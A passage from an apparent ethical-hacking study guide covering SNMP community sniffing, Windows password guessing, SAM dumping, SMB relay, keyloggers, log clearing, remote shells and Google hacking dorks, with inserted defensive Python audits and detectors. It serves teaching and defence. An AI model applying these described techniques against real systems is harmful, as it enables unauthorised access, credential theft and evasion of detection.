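    return _tlv(0x30, _tlv(0x02, b"\x00") + _tlv(0x04, community.encode()) + pdu)


def parse_snmp_header(packet):
    """Return (version, community, pdu_tag) from a raw SNMPv1/v2c datagram."""
    tag, body, _ = _read_tlv(packet, 0)
    if tag != 0x30:
        raise ValueError("not an SNMP message")
    tag, version, pos = _read_tlv(body, 0)
    if tag != 0x02:
        raise ValueError("missing version field")
    tag, community, pos = _read_tlv(body, pos)
    if tag != 0x04:
        raise ValueError("missing community field")
    pdu_tag, _, _ = _read_tlv(body, pos)
    return int.from_bytes(version, "big"), community.decode("latin-1"), pdu_tag


def audit_capture(packets):
    """Return (source, community, version) for datagrams using a default community."""
    findings = []
    for src, payload in packets:
        version, community, _ = parse_snmp_header(payload)
        if community in DEFAULT_COMMUNITIES:
            findings.append((src, community, "v1" if version == 0 else "v2c"))
    return findings


# Constructed capture: two management stations polling sysDescr.0. The
# addresses and the non-default community string are invented.
SAMPLE_CAPTURE = [
    ("10.0.0.5", build_v1_get("public")),
    ("10.0.0.9", build_v1_get("r0-m0nitoring-only")),
]

# The first packet written out byte by byte, so the clear-text community is visible.
SAMPLE_GET_HEX = (
    "3026"                  # SEQUENCE, 38 bytes follow
    "020100"                # INTEGER version = 0 (SNMPv1)
    "04067075626c6963"      # OCTET STRING "public"
    "a019"                  # GetRequest-PDU, 25 bytes
    "020101020100020100"    # request-id 1, error-status 0, error-index 0
    "300e300c"              # VarBindList containing one VarBind
    "06082b06010201010100"  # OID 1.3.6.1.2.1.1.1.0
    "0500"                  # NULL value (a request carries no value)
)

if __name__ == "__main__":
    print(audit_capture(SAMPLE_CAPTURE))
```

Anything that can see the wire (a span port, a sensor, a packet capture) can read the community the same way, which is why the text treats the defaults as passwords that must be changed.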

4. WINDOWS HACKING & SYSTEM ATTACKS

System/Windows hacking is the point at which the line is crossed and an actual connection is made.

It is the first true attack phase as the attacker is actually breaking and entering. This may be

achieved by an administrative connection or an enumerated share.


Identifying Shares

One of the easiest ways to enumerate shares is with the net view command. This will identify all public shares. Hidden shares, those whose names end in "$", will not be displayed. Common hidden shares include IPC$, C$, D$ and Admin$. There are several GUI tools that can be used to identify both non-hidden and hidden shares, such as DumpSec and Legion.

Password Guessing

Many times, password guessing is successful because people like to use easy to remember words

and phrases. A diligent attacker will look for subtle clues throughout the enumeration process to

key in on probable words or phrases the account holder may have used for a password. Accounts

that will be focused on for possible attack include:

Accounts that haven't changed passwords

Service accounts

Shared accounts

Accounts that indicate the user has never logged in

Accounts that have information in the comment field that may compromise password

security

Manual Password Guessing

Assuming that a vulnerable account has been identified, the most common method of attack is

manual password guessing. The net use command can be issued from the command line to

attempt the connection.

Performing Automated Password Guessing

If manual password guessing was unsuccessful, attackers will most likely turn to automated tools. Most automated password guessing tools use dictionaries to try to crack accounts. These attacks can be automated from the command line by using the "FOR" command, or they can be attempted by using tools such as NAT or ENUM. To use NAT, two files would first need to be created: the first would contain a list of possible user names, while the second would be a dictionary file. Each user name would be attempted with every word in the dictionary until a match was achieved or all possibilities were exhausted.

Password Guessing Countermeasures

Password guessing is made much more difficult when administrators use strict password policies.

These policies should specify passwords that:

Are complex

Contain upper case and lower case letters

Use numbers, letters, and special characters


It is not uncommon to hear individuals talk about pass-phrases; this concept helps users realize that

common words are not robust passwords. Another excellent password guessing countermeasure is

to simply move away from passwords completely. Of the three types of authentication (see below),

passwords are the weakest:

Something You Know - Passwords

Something You Have - Smart Cards

Something You Are – Biometrics

Monitoring Event Viewer Logs

No matter which form of authentication you choose, policies should be in place that require the

regular review of event logs. Attacks cannot be detected if no one is monitoring activity. Luckily,

there are tools to ease the burden of log file review and management. VisualLast is a tool that makes it easy to monitor and assess log activity and has a number of sophisticated features.

Sniffing Passwords

Windows uses a challenge / response authentication method that is based on the NTLM

protocol. The protocol requires a client to contact a server for domain authentication and a hash is

passed. NTLM also functions in a peer-to-peer network. Through the years, NTLM has evolved.

The three basic forms of NTLM are listed below:

LAN Manager – Insecure, used for Windows 3.11, 95, and 98 computers

NTLM V1 – Used for Windows NT Service Pack 3 or earlier

NTLM V2 – A more secure version of challenge response protocol used by Windows 2000

and XP

One problem with NTLM is that it is backwards compatible by default. This means if the network

contains Windows 95/98 computers, the protocol will step down to the weaker form of

authentication to try to allow authentication. This can be a big security risk. It is advisable to

disable this by making a change to the Local Policies Security Options template. Another

problem with NTLM is that tools have been developed that can extract the passwords from the

logon exchange. One such set of tools is ScoopLM and BeatLM from http://www.securityfriday.com; another is L0phtCrack. NTLM is not the only protocol that might

be sniffed on an active network. Tools also exist to capture and crack Kerberos authentication.

The Kerberos protocol was developed to provide a secure means for mutual authentication

between a client and a server. Kerberos is found in large complex network environments. One of

the tools that might be used to attempt to defeat this protocol is KerbCrack.

Privilege Escalation

If by this point the attacker has compromised an account, but not one of administrator status, the

amount of damage he can do is limited. To be in full control of the system, the attacker needs

administrator status. This is achieved through privilege escalation. What makes this most

difficult is that these exploits must typically be run on the system under attack. Three ways this

may be achieved:


Trick the user into executing a particular program.

Copy the privilege escalation program to the system and schedule it to run at a

predetermined time

Gain interactive access to the system.

Retrieving the SAM File

One of the first activities that an attacker will usually attempt after gaining administrative access is

that of stealing the SAM (Security Account Manager) file. The SAM contains the user account

passwords stored in their hashed form. Microsoft raised the bar with the release of NT service

pack 3. Products newer than this release contain a second layer of encryption called the SYSKEY.

Even if an attacker obtains the SYSKEY hash, he must still defeat its 128-bit encryption. Todd

Sabin found a way around this through the process of DLL injection and created a tool called

Pwdump. This tool allows the attacker to hijack a privileged process and bypass SYSKEY

encryption. Pwdump requires administrative access.

Cracking Windows Passwords

Once the passwords have been stolen, they will need to be cracked. This can be accomplished by

using a password-cracking program. Password cracking programs can mount several different

types of attacks. These include:

Dictionary Attack

Hybrid Attack

Brute Force Attack.

Windows Password Insecurities

One of the big insecurities of Windows passwords is that if the WIN2K domain is set up to be

backwards compatible, the passwords are 14 characters or less. This version of the hash is

known as the LanManager (LANMAN) Hash. What makes LANMAN quickly crackable is that

while the password can be up to 14 characters, the passwords are actually divided into two 7

character fields. Thus, cracking can proceed simultaneously against each 7-character field.

Several tools are available to exploit this weakness, including, L0phtCrack and John the Ripper.
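An added Python example (not from the page, and not the output of any of the tools it names) that audits a pwdump-style dump for the LANMAN weaknesses just described. It relies on one well-known constant: the LM hash of a 7-byte block that is all padding is AAD3B435B51404EE, so a second half equal to that value means the password is 7 characters or shorter, and both halves equal to it means no LM hash is stored at all. The dump lines, account names and the other hash values are constructed.

```python
# LM hash of an all-padding 7-byte block. It is the second half of the hash
# whenever the password is 7 characters or shorter, and both halves when the
# system stores no LM hash at all.
EMPTY_LM_HALF = "aad3b435b51404ee"
NO_PASSWORD = "no password*********************"  # pwdump's marker for the same case


def parse_pwdump_line(line):
    """pwdump output is user:RID:LM hash:NT hash:::"""
    user, rid, lm_hash, nt_hash = line.strip().split(":")[:4]
    return user, int(rid), lm_hash.lower(), nt_hash.lower()


def audit_lm_hashes(lines):
    """Map each user to the LANMAN weaknesses visible from the dump alone."""
    findings = {}
    for line in lines:
        if not line.strip():
            continue
        user, rid, lm_hash, _ = parse_pwdump_line(line)
        issues = []
        if lm_hash not in (NO_PASSWORD, EMPTY_LM_HALF * 2):
            issues.append("LM hash stored: two independent 7-character halves to crack")
            if lm_hash[16:] == EMPTY_LM_HALF:
                issues.append("second half is empty: password is 7 characters or shorter")
        if rid == 500 and user.lower() != "administrator":
            issues.append("RID 500: this is the real Administrator account")
        findings[user] = issues
    return findings


# Constructed dump: every hash here is made-up hex except the well-known
# empty-half constant; nothing comes from a real system.
SAMPLE_DUMP = """\
Administrator:500:aad3b435b51404eeaad3b435b51404ee:0123456789abcdef0123456789abcdef:::
svc_backup:1004:0f20048efc645d0caad3b435b51404ee:fedcba9876543210fedcba9876543210:::
jsmith:1001:0f20048efc645d0c4a3b108f3fa6cb6d:00112233445566778899aabbccddeeff:::
""".splitlines()

if __name__ == "__main__":
    for user, issues in audit_lm_hashes(SAMPLE_DUMP).items():
        print(user, issues or ["no LM hash stored"])
```

Run over a dump of your own domain, the first line is the outcome you want for every account: no LM hash at all, which leaves a cracker only the NT hash and the full password length to work against.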

Password Cracking Countermeasures

The domain password policy should be configured to prevent users from reusing a password, or at least so that eight to ten new passwords must be used before an old password can be reused. This policy can be enforced through the local / domain security policy. Passwords:

Should be at least 7 or 14 characters long

Should be upper and lower case

Should be numbers, letters, and special characters (*! &@#%$)

Should have a maximum life of no more than 30-days


Another countermeasure to password cracking is to use one-time passwords. There are several

different one-time password schemes available. The most widely used replacement is the smart

cards; SecurID is a popular choice.

SMB Redirection

An SMB (Server Message Block) redirect attack may be attempted by tricking a user into authenticating to a bogus SMB server. This allows the attacker to capture the victim's hashed credentials. The user may be tricked by clicking on a link embedded in an e-mail, so users should always use caution when clicking on e-mail links. Several tools are available to help attackers pull off this hack. One of these tools is SMBRelay, a fraudulent SMB server used to capture usernames and passwords.

Physical Access

If an attacker can gain physical access to your facility or equipment, he'll own it. Without physical access control, all administrative and technical barriers can typically be overcome. This holds true for any piece of equipment. Even routers are not immune: Cisco's website details how to reset passwords if you have physical access (http://www.cisco.com/warp/public/474/).

Many programs are available that can be used to bypass NTFS security or to reset the administrator password. Some of these programs are Offline NT Password Resetter, NTFSDOS and LinNT.

Keystroke Logging

Keystroke loggers can be hardware or software based. These programs will log and capture all

the keystrokes a user types. Some of these programs, such as eBlaster, will even secretly e-mail

the captured keystrokes to a predetermined e-mail account.

Keystroke loggers (or keyloggers) intercept the target's keystrokes and either save them in a file to be read later or transmit them to a predetermined destination accessible to the hacker. Since keystroke logging programs record every keystroke typed on the keyboard, they can capture a wide variety of confidential information, including passwords, credit card numbers, private e-mail correspondence, names, addresses, and phone numbers.

Some Famous Keyloggers

Actual Spy

Perfect Keylogger

Family Keylogger

Home Keylogger

Soft Central Keylogger

Adramax Keylogger


Rootkits

Rootkits are malicious code developed for the specific purpose of allowing hackers to gain expanded access to a system and hide their presence. While rootkits have been available in the Linux world for many years, they are now starting to make their way into the Windows environment. Rootkits are considered freeware and are readily available on the Internet. If you suspect a computer has been rootkitted, you'll need to use an MD5 checksum utility or a program such as Tripwire to verify the integrity of your programs. The only other alternative is to rebuild the computer from known good media.

Evidence Hiding

Once an attacker has gained full control of the victim's computer, he will typically try to cover his tracks. According to Locard's Exchange Principle, "whenever someone comes in contact with another person, place, or thing, something of that person is left behind." This means the attacker must clear log files, eliminate evidence, and cover his tracks. A common tool the attacker will use to disable logging is the auditpol command. The attacker will also attempt to clear the log. This may be accomplished with the Elsave command, which will remove all entries from the logs except one showing that the logs were cleared. Other tools an attacker may attempt to use at this point include Winzapper and Evidence Eliminator.
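The one entry that survives a log clearing, together with the audit-policy change that auditpol leaves behind, is exactly what the earlier section on monitoring Event Viewer logs says someone must be reading. As an added Python example (not from the page or from VisualLast), here is detection logic run over a constructed Security log export: it alerts on the Windows NT/2000/XP event IDs 517 (audit log cleared) and 612 (audit policy changed), on their Vista-and-later equivalents 1102 and 4719, and on a burst of failed logons (529, or 4625 on newer systems) that would precede the lockout the password guessing section warns about. The simplified CSV column layout, timestamps and account names are constructed, not Event Viewer's own export format.

```python
import csv
import io
from collections import Counter

# Security log event IDs worth alerting on. 517 and 612 are the Windows
# NT/2000/XP numbers; 1102 and 4719 are their Vista-and-later equivalents.
TAMPERING_EVENTS = {
    517: "audit log cleared",
    612: "audit policy changed",
    1102: "security log cleared",
    4719: "audit policy changed",
}
FAILED_LOGON_EVENTS = {529, 4625}  # NT/2000/XP and Vista-and-later logon failure


def analyze_security_log(csv_text, failed_logon_threshold=5):
    """Return alert strings for log tampering and bursts of failed logons."""
    alerts = []
    failures = Counter()
    for row in csv.DictReader(io.StringIO(csv_text)):
        event_id = int(row["EventID"])
        if event_id in TAMPERING_EVENTS:
            alerts.append(
                f"{row['Time']} {TAMPERING_EVENTS[event_id]} ({event_id}) by {row['User']}"
            )
        if event_id in FAILED_LOGON_EVENTS:
            failures[row["User"]] += 1
    for user, count in failures.items():
        if count >= failed_logon_threshold:
            alerts.append(f"{count} failed logons for {user}: possible password guessing")
    return alerts


# Constructed export in a simplified layout (Time,EventID,User,Description);
# the timestamps and account names are invented. 528 is a successful logon.
SAMPLE_LOG = """\
Time,EventID,User,Description
2004-03-01 22:10:01,529,jsmith,Logon failure: bad password
2004-03-01 22:10:03,529,jsmith,Logon failure: bad password
2004-03-01 22:10:05,529,jsmith,Logon failure: bad password
2004-03-01 22:10:07,529,jsmith,Logon failure: bad password
2004-03-01 22:10:09,529,jsmith,Logon failure: bad password
2004-03-01 22:10:11,529,jsmith,Logon failure: bad password
2004-03-01 22:15:44,528,jsmith,Successful logon
2004-03-01 22:20:10,612,jsmith,Audit policy change
2004-03-01 22:21:02,517,jsmith,The audit log was cleared
"""

if __name__ == "__main__":
    for alert in analyze_security_log(SAMPLE_LOG):
        print(alert)
```

Because clearing the log destroys everything before it, these alerts are only useful if the events are forwarded to a collector the attacker cannot reach before the log is cleared.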

File Hiding

Various techniques are used by attackers in an attempt to hide their tools on the compromised

computer. Some attackers may just attempt to use attrib to hide files, while others may place their

warez in low traffic areas; e.g., winnt/system32/os2drivers. One of the most advanced file

hiding techniques is NTFS File Streaming. A tool that is available to detect streamed files is Sfind.

Data Hiding

Other data hiding techniques deal with moving information in and out of networks undetected. This can be accomplished through the use of bitmaps, MP3 files, whitespace hiding, and others. Each is briefly described below:

Steganography - The art of hiding text inside of images
ImageHide - A stego program
MP3Stego - A stego program that hides text in MP3 files
Snow - A stego program that hides text in the whitespace inside of documents
Camera/Shy - Used to hide text in web-based images

While there are tools such as StegDetect that can sometimes find these files, that by no means implies you will be able to break their encryption and uncover the contents.
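Whitespace hiding of the kind Snow performs is one of the few techniques in this list a defender can screen for with plain text processing. The following added Python example (not from the page or from any of the tools named) profiles the trailing spaces and tabs on each line of a document, applies a simple heuristic (many lines ending in a mix of spaces and tabs, which honest text rarely has), and shows the mitigation: normalising trailing whitespace on the way out destroys any payload carried there. Both memos are constructed; the thresholds are an assumption to be tuned.

```python
def trailing_whitespace_runs(text):
    """Return (line number, trailing run) for every line ending in spaces or tabs."""
    runs = []
    for number, line in enumerate(text.replace("\r\n", "\n").split("\n"), 1):
        tail = line[len(line.rstrip(" \t")):]
        if tail:
            runs.append((number, tail))
    return runs


def looks_like_whitespace_stego(text, min_lines=3, min_ratio=0.5):
    """Heuristic: many lines with mixed trailing spaces and tabs is rare in honest text."""
    lines = text.replace("\r\n", "\n").split("\n")
    runs = trailing_whitespace_runs(text)
    ratio = len(runs) / len(lines) if lines else 0.0
    mixed = sum(1 for _, tail in runs if " " in tail and "\t" in tail)
    return len(runs) >= min_lines and ratio >= min_ratio and mixed >= min_lines


def strip_trailing_whitespace(text):
    """Normalising a document on the way out removes any whitespace-carried payload."""
    return "\n".join(line.rstrip(" \t") for line in text.replace("\r\n", "\n").split("\n"))


# Constructed samples: the suspect memo simply has spaces and tabs appended
# to each line, the way a whitespace stego tool would leave them.
CLEAN_MEMO = "Quarterly report\nThe numbers look fine\nSee you Monday\n"
SUSPECT_MEMO = "Quarterly report \t \t\t \nThe numbers look fine\t \t  \nSee you Monday  \t \t\n"

if __name__ == "__main__":
    for name, memo in (("clean", CLEAN_MEMO), ("suspect", SUSPECT_MEMO)):
        print(name, looks_like_whitespace_stego(memo), trailing_whitespace_runs(memo))
```

The heuristic finds nothing in a document whose carrier is an image or an MP3; for those the text's caveat stands, and a detector such as StegDetect is the tool to reach for.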


Prompting the Box

The final step for the attacker is that of becoming the target. Up to this point, the attacker has been

able to maintain a connection to the target, but may not yet have the ability to execute and run

programs locally. The following three tools will allow the attacker to become the target: Psexec,

Remoxec, and Netcat. When the attacker has a command prompt on the victim's computer, he will typically restart the methodology, looking for other internal targets to attack and compromise.

5. GOOGLING/GOOGLE HACKING

Google Searching Basics:

Building Google Queries:

Google query building is a process. There's really no such thing as an incorrect search. It's entirely possible to create an ineffective search, but with the explosive growth of the Internet and the size of Google's cache, a query that's inefficient today may just provide good results tomorrow, or next month or next year. The idea behind effective Google searching is to get a firm grasp on the basic syntax and then to get a good grasp of effective narrowing techniques. Learning the Google query syntax is the easy part. Learning to effectively narrow searches can take quite a bit of time and requires a bit of practice. Eventually, you'll get a feel for it, and it will become second nature to find the needle in the haystack.

Golden Rules of Google Searching:

1. Google queries are not case sensitive.

Google doesn't care if you type your query in lowercase letters (hackers), uppercase (HACKERS), camel case (hAcKeR), or psycho-case (haCKeR); the word is always regarded the same way.

2. Google wildcards

Google's concept of wildcards is not the same as a programmer's concept of wildcards. Most consider wildcards to be either a symbolic representation of any single letter (UNIX fans may think of the question mark) or any series of letters represented by an asterisk. This type of technique is called stemming. Google's wildcard, the asterisk (*), represents nothing more than a single word in a search phrase. Using an asterisk at the beginning or end of a word will not provide you any more hits than using the word by itself.

3. Google stems automatically.

Google will stem, or expand, words automatically when it's appropriate. For example, consider a search for pet lemur dietary needs, as shown in Figure 1.12. Google will return a hit that includes the word lemur along with pet and, surprisingly, the word diet, which is short for dietary. Keep in mind that this automatic stemming feature can provide you with unpredictable results.

4. Google reserves the right to ignore you

Google ignores certain common words, characters, and single digits in a search. These

are sometimes called stop words. When Google ignores any of your search terms, you


will be notified on the results page, just below the query box, as shown in Figure 1.13.

Some common stop words include who, where, what, the, a, or an. Curiously enough, the

logic for word exclusion can vary from search to search.

5. Ten-word limit

Google limits searches to 10 terms. This includes search terms as well as advanced operators, which we'll discuss in a moment. There is a fairly effective way to get more than 10 search terms crammed into a query: replace Google's ignored terms with the wildcard character (*). Google does not count the wildcard character as a search term, allowing you to extend your searches quite a bit.

Basic Searching

Google searching is a process, the goal of which is to find information about a topic. The process begins with a basic search, which is modified in a variety of ways until only the pages of relevant information are returned. Google's ranking technology helps this process along by placing the highest-ranking pages on the first results page. The details of this ranking system are complex and somewhat speculative, but suffice it to say that for our purposes Google rarely gives us exactly what we need following a single search.

Using Boolean Operators and Special Characters

More advanced than basic word searches, phrase searches are still a basic form of a Google query.

To perform advanced queries, it is necessary to understand the Boolean operators AND, OR, and

NOT. To properly segment the various parts of an advanced Google query, we must also explore

visual grouping techniques that use the parenthesis characters. Finally, we will combine these

techniques with certain special characters that may serve as shorthand for certain operators,

wildcard characters, or placeholders. Boolean operators help specify the results that are

returned from a query. If you are already familiar with Boolean operators, take a moment to skim

this section to help you understand Google's particular implementation of these operators, since

many search engines handle them in different ways. Improper use of these operators could

drastically alter the results that are returned.

The most commonly used Boolean operator is AND. This operator is used to include multiple

terms in a query. For example, a simple query like hacker could be expanded with a Boolean

operator by querying for hacker AND cracker. The latter query would include not only pages that

talk about hackers but also sites that talk about hackers and the snacks they might eat. Some search

engines require the use of this operator, but Google does not. The term AND is redundant to

Google. By default, Google automatically searches for all the terms you include in your query.

The plus symbol (+) forces the inclusion of the word that follows it. There should be no space

following the plus symbol.

Another common Boolean operator is NOT. Functionally the opposite of the AND operator, the

NOT operator excludes a word from a search. One way to use this operator is to preface a search

word with the minus sign (–). Be sure to leave no space between the minus sign and the search

term. Consider a simple query such as hacker. This query is very generic and will return hits for all

sorts of occupations, like golfers, woodchoppers, serial killers, and those with chronic bronchitis.

With this type of query, you are most likely not interested in each and every form of the word

hacker but rather a more specific rendition of the term. To narrow the search, you could include


more terms, which Google would automatically AND together, or you could start narrowing the

search by using NOT to remove certain terms from your search.

Google Advanced Operators:

Introduction

Beyond the basic searching techniques explored in the previous chapter, Google offers special terms known as advanced operators to help you perform more advanced queries. These operators, when used properly, can help you get to exactly the information you're looking for without spending too much time poring over page after page of search results. When advanced operators are not provided in a query, Google will locate your search terms in any area of the Web page, including the title, the text, the URL, or the like. We take a look at the following advanced operators in this chapter:

(a) intitle, allintitle

(b) inurl, allinurl

(c) filetype

(d) allintext

(e) site

(f) link

(g) inanchor

(h) daterange

(i) cache

(j) info

(k) related

(l) phonebook

(m) rphonebook

(n) bphonebook

(o) author

(p) group

(q) msgid

(r) insubject

(s) stocks

(t) define

Operator Syntax

An advanced operator is nothing more than a part of a query. You provide advanced operators to

Google just as you would any other query. In contrast to the somewhat free-form style of standard

Google queries, however, advanced operators have a fairly rigid syntax that must be followed. The

basic syntax of a Google advanced operator is operator:search_term. When using advanced

operators, keep in mind the following:


There is no space between the operator, the colon, and the search term. Violating this

syntax can produce undesired results and will keep Google from understanding the

advanced operator. In most cases, Google will treat a syntactically bad advanced operator

as just another search term.

For example, providing the advanced operator intitle without a following colon and

search term will cause Google to return pages that contain the word intitle.

The search term is the same syntax as search terms we covered in the previous chapter.

For example, you can provide as a search term a single word or a phrase surrounded

by quotes. If you provide a phrase as the search term, make sure there are no spaces

between the operator, the colon, and the first quote of the phrase.

Boolean operators and special characters (such as OR and +) can still be applied to

advanced operator queries, but be sure not to place them in the way of the separating colon.

Advanced operators can be combined in a single query as long as you honor both the basic

Google query syntax as well as the advanced operator syntax. Some advanced operators

combine better than others, and some simply cannot be combined.

The ALL operators (the operators beginning with the word ALL) are oddballs. They are

generally used once per query and cannot be mixed with other operators.
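The syntax rules above are mechanical enough to check by machine. As an added Python example (not code from the page or from Google), the following parser splits a query into operators, arguments and +/- signs, keeping quoted phrases intact, and then lints it for the mistakes the list warns about: a space after the colon, an operator typed without its colon, an ALL operator mixed with other operators, and the ten-term limit with the asterisk left uncounted. The operator list is the one printed in this chapter; treating every non-wildcard token (including OR) as a counted term is an assumption, since the text does not say how OR is counted.

```python
import re

# Advanced operators listed in this chapter.
KNOWN_OPERATORS = {
    "intitle", "allintitle", "inurl", "allinurl", "filetype", "allintext",
    "site", "link", "inanchor", "daterange", "cache", "info", "related",
    "phonebook", "rphonebook", "bphonebook", "author", "group", "msgid",
    "insubject", "stocks", "define",
}

# One token: optional +/- sign, optional operator prefix, then either a
# quoted phrase or a run of non-space characters.
TOKEN_RE = re.compile(r'[+-]?(?:[A-Za-z]+:)?"[^"]*"|\S+')


def parse_query(query):
    """Return (operator or None, argument, sign) for each token of a query."""
    parsed = []
    for token in TOKEN_RE.findall(query):
        sign = ""
        if token[0] in "+-":
            sign, token = token[0], token[1:]
        name, colon, argument = token.partition(":")
        if colon and name.lower() in KNOWN_OPERATORS:
            parsed.append((name.lower(), argument, sign))
        else:
            parsed.append((None, token, sign))
    return parsed


def lint_query(query):
    """Report the syntax mistakes this chapter warns about."""
    problems = []
    parsed = parse_query(query)
    for operator, argument, _ in parsed:
        if operator and not argument:
            problems.append(f"{operator}: has no argument (a space after the colon?)")
        if operator is None and argument.lower() in KNOWN_OPERATORS:
            problems.append(f"'{argument}' has no colon and will be searched as an ordinary word")
    operators = [op for op, _, _ in parsed if op]
    if any(op.startswith("all") for op in operators) and len(operators) > 1:
        problems.append("ALL operators are used once per query and not mixed with others")
    # The ten-term limit counts words and operators alike, but not the * wildcard.
    # Assumption: OR is counted like any other word here.
    counted = [arg for op, arg, _ in parsed if not (op is None and arg == "*")]
    if len(counted) > 10:
        problems.append(f"{len(counted)} terms: over Google's ten-term limit")
    return problems


if __name__ == "__main__":
    for q in ('intitle:"index of" site:example.com', "intitle index.of", "intitle: backup"):
        print(q, "->", parse_query(q), lint_query(q))
```

Only the query text is examined; nothing is sent to Google, so the linter can run as a pre-check in a script that builds queries from a template.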

Google's Advanced Operators

Intitle and Allintitle: Search Within the Title of a Page

Allintext: Locate a String Within the Text of a Page

Inurl and Allinurl: Finding Text in a URL

Site: Narrow Search to Specific Sites

Filetype: Search for Files of a Specific Type

Link: Search for Links to a Page

Inanchor: Locate Text Within Link Text

Cache: Show the Cached Version of a Page

Numrange: Search for a Number

Daterange: Search for Pages Published Within a Certain Date Range

Info: Show Google's Summary Information

Related: Show Related Sites

Author: Search Groups for an Author of a Newsgroup Post

Group: Search Group Titles

Insubject: Search Google Groups Subject Lines

Msgid: Locate a Group Post by Message ID

Stocks: Search for Stock Information

Define: Show the Definition of a term

Phonebook: Search Phone Listings


Google Hacking Basics:

Anonymity with Caches

Google's cache feature is truly an amazing thing. The simple fact is that if Google crawls a page or document, you can almost always count on getting a copy of it, even if the original source has since dried up and blown away. Of course the down side of this is that hackers can get a copy of your sensitive data even if you've pulled the plug on that pesky Web server. Another down side of the cache is that the bad guys can crawl your entire Web site (including the areas you "forgot" about) without even sending a single packet to your server. If your Web server doesn't get so much as a packet, it can't write anything to the log files. If there's nothing in the log files, you might not have any idea that your sensitive data has been carried away. It's sad that we even have to think in these terms, but untold megabytes, gigabytes, and even terabytes of sensitive data leak from Web servers every day. Understanding how hackers can mount an anonymous attack on your sensitive data via Google's cache is of utmost importance. Google grabs a copy of most Web data that it crawls. There are exceptions, and this behavior is preventable.

Google as a Proxy Server

Although this technique might not work forever, at the time of this writing it's possible to use Google itself as a proxy server. This technique requires a Google translated URL and some minor URL modification. To make this work, we first need to generate a translation URL. The easiest way to do this is through Google's translation service, located at www.google.com/translate_t. If you were to enter a URL into the "Translate a web page" field, select a language pair, and click the Translate button, Google would translate the contents of the Web page and generate a translation URL that could be used for later reference. The langpair parameter, which is only available for the translation service, describes which languages to translate to and from, respectively. The arguments to this parameter are identical to the hl parameters. What would happen if we were to translate a page from one language into the same language? This would change our translation URL to:

http://www.google.com/translate?u=http%3A%2F%2Fwww.google.com&langpair=en%7Cen&hl=en&ie=Unknown&oe=ASCII

If we loaded this URL into our browser, and if the source page were in English to begin with, we would see a page. First, you should notice that the Google search page in the bottom frame of the browser window looks pretty familiar. In fact, it looks identical to the original search page. This is because no real language translation occurred. The top frame of the browser window shows the standard translation banner. Admittedly, all this work seems a bit anticlimactic, since all we have to show for our efforts is an exact copy of a page we could have just loaded directly. Fortunately, there is a payoff when we consider what happens behind the scenes. Let's look at another example, this time translating the www.phrack.org/hardcover62/ Web page while monitoring network traffic with tcpdump -n -U -t. This is not a perfect proxy solution and should not be used as the sole proxy server in your toolkit. We present it simply as an example of what a little creative thinking can accomplish. While Google is acting as a proxy server, it is a transparent proxy server, which means the target Web site can still see our IP address in the connection logs, despite the fact that Google grabbed the page for us.


Directory Listings

A directory listing is a type of Web page that lists files and directories that exist on a Web server.

Designed to be navigated by clicking directory links, directory listings typically have a title that

describes the current directory, a list of files and directories that can be clicked, and often a footer

that marks the bottom of the directory listing. Much like an FTP server, directory listings offer a

no-frills, easy-install solution for granting access to files that can be stored in categorized folders.

Unfortunately, directory listings have many faults, specifically:

They are not secure in and of themselves. They do not prevent users from downloading

certain files or accessing certain directories. This task is often left to the protection

measures built into the Web server software or third-party scripts, modules, or programs

designed specifically for that purpose.

They can display information that helps an attacker learn specific technical details about

the Web server.

They do not discriminate between files that are meant to be public and those that are

meant to remain behind the scenes.

They are often displayed accidentally, since many Web servers display a directory listing

if a top-level index file (index.htm, index.html, default.asp, and so on) is missing or

invalid.

All this adds up to a deadly combination.
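Most accidental listings come from the fourth fault above, a directory with no index file on a server that is allowed to generate listings. As an added Python example (not from the page), here is an audit of that setting for Apache httpd, whose Options directive enables listings with Indexes (and with All, which implies it) and disables them with -Indexes: it parses the <Directory> blocks of a configuration fragment, reports which directories would produce listings, and rewrites the Options lines so none of them does. The configuration fragment and its paths are constructed; the first block shows the weak setting, the second the corrected one, and the third inherits whatever its parent decided.

```python
import re

DIRECTORY_RE = re.compile(r'<Directory\s+"?([^">]+?)"?\s*>(.*?)</Directory>', re.S | re.I)
OPTIONS_RE = re.compile(r"^([ \t]*)Options[ \t]+(.+?)[ \t]*$", re.M | re.I)
LISTING_OPTIONS = ("indexes", "all")  # 'All' switches Indexes on as well


def indexes_enabled(options_args):
    """True/False if this Options line decides listings, None if it inherits."""
    tokens = options_args.split()
    relative = any(t[0] in "+-" for t in tokens)
    if not relative:  # absolute form replaces the whole option set
        return any(t.lower() in LISTING_OPTIONS for t in tokens)
    state = None
    for t in tokens:
        if t[1:].lower() in LISTING_OPTIONS:
            state = t[0] == "+"
    return state


def audit_httpd_conf(conf_text):
    """Map each <Directory> path to whether it will serve directory listings."""
    result = {}
    for path, body in DIRECTORY_RE.findall(conf_text):
        state = None
        for match in OPTIONS_RE.finditer(body):
            decided = indexes_enabled(match.group(2))
            if decided is not None:
                state = decided
        result[path] = state
    return result


def harden_options(options_args):
    """Drop Indexes from an Options argument list without touching other options."""
    tokens = options_args.split()
    relative = any(t[0] in "+-" for t in tokens)
    kept = []
    for t in tokens:
        if t.lstrip("+-").lower() == "indexes":
            if relative:
                kept.append("-Indexes")
            continue
        kept.append(t)  # 'All' is left as found: replace it with an explicit list by hand
    if not relative and not kept:
        kept.append("None")
    return " ".join(kept)


def harden_httpd_conf(conf_text):
    """Rewrite every Options line so no <Directory> block enables listings."""
    return OPTIONS_RE.sub(lambda m: m.group(1) + "Options " + harden_options(m.group(2)), conf_text)


# Constructed httpd.conf fragment; the paths are invented.
WEAK_CONF = """\
<Directory "/var/www/html">
    Options Indexes FollowSymLinks
    AllowOverride None
</Directory>
<Directory /var/www/files>
    Options -Indexes +FollowSymLinks
</Directory>
<Directory "/var/www/docs">
    AllowOverride None
</Directory>
"""

if __name__ == "__main__":
    print("before:", audit_httpd_conf(WEAK_CONF))
    print("after: ", audit_httpd_conf(harden_httpd_conf(WEAK_CONF)))
```

A block that reports None has not decided for itself; whether it lists depends on the server-level Options, so the audit is only complete once that line is checked too.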

Locating Directory Listings

The most obvious way an attacker can abuse a directory listing is by simply finding it! Since directory listings offer "parent directory" links and allow browsing through files and folders, even the most basic attacker might soon discover that sensitive data can be found by simply locating the listings and browsing through them. Locating directory listings with Google is fairly straightforward. An obvious query to find such pages might be intitle:index.of, which could find pages with the term index of in the title of the document. Remember that the period (".") serves as a single-character wildcard in Google. Unfortunately, this query will return a large number of false positives, such as pages with the following titles:

Index of Native American Resources on the Internet

LibDex - Worldwide index of library catalogues

Iowa State Entomology Index of Internet Resources

Judging from the titles of these documents, it is obvious that not only are these Web pages

